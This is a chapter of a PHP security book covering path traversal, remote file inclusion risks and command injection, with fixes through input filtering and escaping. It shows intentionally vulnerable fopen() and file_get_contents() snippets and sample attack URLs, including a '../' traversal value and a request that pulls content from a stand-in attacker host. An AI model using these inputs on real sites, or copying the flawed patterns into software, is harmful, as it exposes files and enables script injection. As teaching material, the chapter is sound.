Chapter 6. Files and Commands

This chapter discusses the risks associated with the use of files and shell commands. PHP has a rich collection of filesystem functions, as well as a few different options for issuing shell commands. In this chapter, I highlight the most common mistakes that developers tend to make regarding the use of these features.

In general, the risks associated with these features resemble many of the risks already covered in this book—using tainted data can have disastrous side effects. Although the vulnerabilities themselves are unique, the practices that you can use to protect your applications are practices that you have already learned.

Traversing the Filesystem

Whenever you use a file in any way, you must indicate the filename at some point. In many cases, the filename is given as an argument to fopen(), and other functions use the handle that it returns:

    <?php

    $handle = fopen('/path/to/myfile.txt', 'r');

    ?>

A vulnerability exists when you use tainted data as part of the filename:

    <?php

    $handle = fopen("/path/to/{$_GET['filename']}.txt", 'r');

    ?>

Because the leading and trailing parts of the full path and filename cannot be manipulated by an attacker in this example, the exploit possibilities are somewhat limited. However, keep in mind that some attacks use a NULL (%00 when passed in the query string) to terminate a string, avoiding any filename extension limitations. In this case, the most dangerous exploit is one in which the attacker traverses the filesystem by using multiple instances of the string ../ to move up the directory tree. For example, imagine a value of filename being passed as follows:

    http://example.org/file.php?filename=../../../../../another/path/to/file

Tip

As is the case with many attacks, using tainted data in the construction of a string provides an attacker with an opportunity to change the string, and this can cause your application to behave unexpectedly. If you begin a habit of using only filtered data to create any dynamic string, you can begin to protect yourself from many types of vulnerabilities, including those with which you might not be familiar.

Because the leading static portion of the filename used in the original fopen() call is /path/to/, this attack traverses up more than is necessary. The attacker does not have the benefit of observing the source code before launching the attack, so the strategy is typically to repeat the string ../ more times than is expected to be necessary. Using too many does not disrupt the attack, so it is not necessary that the attacker guess the correct depth.

This particular attack alters the intended behavior of the fopen() call, reducing it to the following:

    <?php

    $handle = fopen('/another/path/to/file.txt', 'r');

    ?>

Upon noticing this problem, or after being the victim of an attack, many developers make the mistake of trying to correct potentially malicious data, sometimes without even inspecting it first. As described in Chapter 1, the best approach is to treat filtering as an inspection process and to force the user to abide by your rules. For example, if every valid filename consists of only alphabetic characters, the following code can enforce this restriction:

    <?php

    $clean = array();

    if (ctype_alpha($_GET['filename']))
    {
      $clean['filename'] = $_GET['filename'];
    }
    else
    {
      /* ... */
    }

    $handle = fopen("/path/to/{$clean['filename']}.txt", 'r');

    ?>

Tip

It is not necessary to escape the filename in any way because this data is being used only in a PHP function—it is not being sent to a remote system.

The basename() function can be useful for inspecting a string to check for unwanted path information:

    <?php

    $clean = array();

    if (basename($_GET['filename']) == $_GET['filename'])
    {
      $clean['filename'] = $_GET['filename'];
    }
    else
    {
      /* ... */
    }

    $handle = fopen("/path/to/{$clean['filename']}.txt", 'r');

    ?>

This approach is slightly less secure than enforcing that the filename consists of only alphabetic characters, but you may not be able to be quite as strict. A good Defense in Depth approach is to combine both methods, especially if you use a regular expression to inspect the data for valid characters (instead of a function like ctype_alpha()).

A more dangerous vulnerability exists when the entire trailing part of the filename is tainted:

    <?php

    $handle = fopen("/path/to/{$_GET['filename']}", 'r');

    ?>

The increased flexibility given to an attacker increases the magnitude of the vulnerability. In this particular case, an attacker can manipulate the filename to refer to any file on the filesystem regardless of the path or file extension, because the file extension is provided as part of $_GET['filename']. As long as the web server has read access to the file, the handle will be to a file chosen by the attacker.

This type of vulnerability becomes even more substantial if the leading part of the path is tainted, and this is the topic of the next section.

Remote File Risks

PHP has a configuration directive called allow_url_fopen that is enabled by default. It allows you to reference many types of resources as though they were local files. For example, you can retrieve the content (HTML) of a particular page by reading from a URL:

    <?php

    $contents = file_get_contents('http://example.org/');

    ?>

As discussed in Chapter 5, this can create severe vulnerabilities when tainted data is used to reference a file in include or require statements. In fact, I consider this particular type of vulnerability to be one of the most dangerous vulnerabilities possible in a PHP application because it allows an attacker to execute arbitrary code.

Although slightly less severe in magnitude, similar vulnerabilities exist when tainted data is used to reference a file in standard filesystem functions. For example, consider reading a file as follows:

    <?php

    $contents = file_get_contents($_GET['filename']);

    ?>

This particular example lets a user manipulate the behavior of file_get_contents() so that it retrieves the contents of a remote resource. Consider a request similar to the following:

    http://example.org/file.php?filename=http%3A%2F%2Fevil.example.org%2Fxss.html

This results in a situation in which $contents is tainted, a fact obscured by the indirect way in which it is obtained. This is another reason why Defense in Depth is such a strong principle—by treating the filesystem as a remote source of data, the value of $contents is considered to be input anyway, so your filtering logic can potentially save the day.

Because $content is tainted, it can lead to many other types of security vulnerabilities, including cross-site scripting and SQL injection . For example, the following illustrates a cross-site scripting vulnerability:

    <?php

    $contents = file_get_contents($_GET['filename']);

    echo $contents;

    ?>

The solution is to never use tainted data to refer to a filename. Always filter input and be sure to use only filtered data when referencing a filename:

    <?php

    $clean = array();

    /* Filter Input ($_GET['filename']) */

    $contents = file_get_contents($clean['filename']);

    ?>

Although this does not guarantee anything about the data within $contents, it does give you reasonable assurance that you are reading a file that you intend to be reading, rather than one chosen by an attacker. To strengthen this approach, you should also treat $contents as input and filter it prior to use:

    <?php

    $clean = array();
    $html = array();

    /* Filter Input ($_GET['filename']) */

    $contents = file_get_contents($clean['filename']);

    /* Filter Input ($contents) */

    $html['contents'] = htmlentities($clean['contents'], ENT_QUOTES, 'UTF-8');

    echo $html['contents'];

    ?>

This provides a very strong defense against numerous types of attacks, and it is the recommended approach.

Command Injection

The use of system commands is a dangerous operation, and this is particularly true when you use remote data to construct the command to be issued. When tainted data is used, this represents a command injection vulnerability.

The exec() function is a popular function used to execute a shell command. It returns the last line of the output of the command, but you can specify an array as the second argument, and each line of output is stored as an element of that array. It can be used as follows:

    <?php

    $last = exec('ls', $output, $return);

    print_r($output);
    echo "Return [$return]";

    ?>

Assume that the ls command provides the following output when executed manually from the shell:

    $ ls
    total 0
    -rw-rw-r--  1 chris chris 0 May 21 12:34 php-security
    -rw-rw-r--  1 chris chris 0 May 21 12:34 chris-shiflett

When executed with exec() as shown in the prior example, the following output is generated:

    Array
    (
        [0] => total 0
        [1] => -rw-rw-r--  1 chris chris 0 May 21 12:34 php-security
        [2] => -rw-rw-r--  1 chris chris 0 May 21 12:34 chris-shiflett
    )
    Return [0]

This is a useful and convenient way to execute shell commands, but this convenience heightens your risk. If tainted data is used to construct the string to be executed, an attacker can execute arbitrary commands.

I recommend that you avoid using shell commands when possible and, when you must use them, ensure that you use only filtered data to construct the string to be executed, and always escape your output:

    <?php

    $clean = array();
    $shell = array();

    /* Filter Input ($command, $argument) */

    $shell['command'] = escapeshellcmd($clean['command']);
    $shell['argument'] = escapeshellarg($clean['argument']);

    $last = exec("{$shell['command']} {$shell['argument']}", $output, $return);

    ?>

Although you can execute shell commands in many different ways, the best practice is to be consistent—ensure that you use only filtered and escaped data when constructing the string to be executed. Other functions that require careful attention include passthru(), popen(), shell_exec(), and system(). If at all possible, I recommend avoiding the use of shell commands altogether.